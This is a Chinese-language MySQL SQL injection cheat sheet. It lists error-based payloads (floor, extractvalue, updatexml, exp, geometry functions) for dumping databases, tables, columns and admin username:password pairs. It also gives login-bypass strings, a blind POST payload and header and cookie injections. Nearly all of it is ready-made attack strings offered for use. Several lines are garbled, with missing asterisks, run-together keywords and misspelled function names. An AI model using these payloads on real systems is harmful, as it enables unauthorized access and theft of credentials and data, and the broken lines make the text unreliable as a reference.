1、通過floor報錯,注入語句如下:
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);
爆數據庫名:'union select 1 from (select count(),concat((select database())," ",floor(rand(0)2))x from information_schema.tables group by x)a
爆表名:'union select 1 from (select count(),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1) ," ",floor(rand(0)2))x from information_schema.tables group by x)a
爆列名:'union select 1 from (select count(),concat((select column_name from information_schema.columns where table_name="TABLE_NAME" limit 0,1) ," ",floor(rand(0)2))x from information_schema.tables group by x)a
爆數據:'union select 1 from (select count(),concat((select COLUMN_NAME from TABLE_NAME limit 0,1) ," ",floor(rand(0)2))x from information_schema.tables group by x)a
2、通過ExtractValue報錯,注入語句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
查數據庫名:id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆數據:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))
3、通過UpdateXml報錯,注入語句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4、通過NAME_CONST報錯,注入語句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)
5、通過join報錯,注入語句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;
6、通過exp報錯,注入語句如下:
and exp(~(select * from (select user () ) a) );
7、通過GeometryCollection()報錯,注入語句如下:
and GeometryCollection(()select *from(select user () )a)b );
8、通過polygon ()報錯,注入語句如下:
and polygon (()select * from(select user ())a)b );
9、通過multipoint ()報錯,注入語句如下:
and multipoint (()select * from(select user() )a)b );
10、通過multlinestring ()報錯,注入語句如下:
and multlinestring (()select * from(selectuser () )a)b );
11、通過multpolygon ()報錯,注入語句如下:
and multpolygon (()select * from(selectuser () )a)b );
12、通過linestring ()報錯,注入語句如下:
and linestring (()select * from(select user() )a)b );
關於POST注入
常用的萬能username語句:
a ’ or 1=1 #
a ") or 1=1 #
a‘) or 1=1 #
a” or “1”=”1
' or '1'='1
' or (length(database())) = 8 (用於輸入’ “都沒有錯誤)
' or (ascii(substr((select database()) ,1,1))) = 115 # (用於輸入’ “都沒有錯誤)
") or ("1")=("1
") or 1=1 or if(1=1, sleep(1), null) #
") or (length(database())) = 8 #
") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #
post型盲注通殺payload:
uname=admin%df'or()or%200%23&passwd=&submit=Submit
關於UPDATEXML,REFERER,COOKIE的構造
User-Agent:.........' or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
Referer: ’ or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
Cookie:username: admin ’ or updatexml(1,concat(0x7e,database(),0x7e),1) #
updatexml報錯注入
爆數據庫版本信息:?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
鏈接用戶:?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
鏈接數據庫:?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆庫:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆表:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段內容:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
注:
① 0x7e=’~’
② concat(‘a’,‘b’)=“ab”
③ version()=@@version
④ ‘~‘可以換成’#’、’$'等不滿足xpath格式的字符
⑤ extractvalue()能查詢字符串的最大長度為32,如果我們想要的結果超過32,就要用substring()函數截取或limit分頁,一次查看最多32位